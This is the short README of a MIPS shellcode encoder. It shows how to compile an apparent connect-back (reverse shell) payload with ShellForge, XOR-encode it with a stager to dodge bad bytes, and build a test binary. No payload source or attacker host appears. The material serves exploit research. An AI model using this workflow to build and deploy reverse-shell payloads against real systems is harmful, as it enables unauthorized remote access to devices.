MIPS shellcode encoder
----------------------

Use sfloader as a stager and a ShellForge produced rawfile to
produce your encoded shellcode.

It has been tested only on big endian MIPS, but endianess should not matter
(the xor encoder has been specifically crafted to be endianess proof)

Example:

./shellforge.py -R --arch=linux_mips connectback.c > connectback.o
./scencode 0xDDDDDDDD sfloader-be.o example/connectback.o > testcb.c
mips-linux-gcc testcb.c -o testcb

Julien TINNES
<julien at cr0.org>
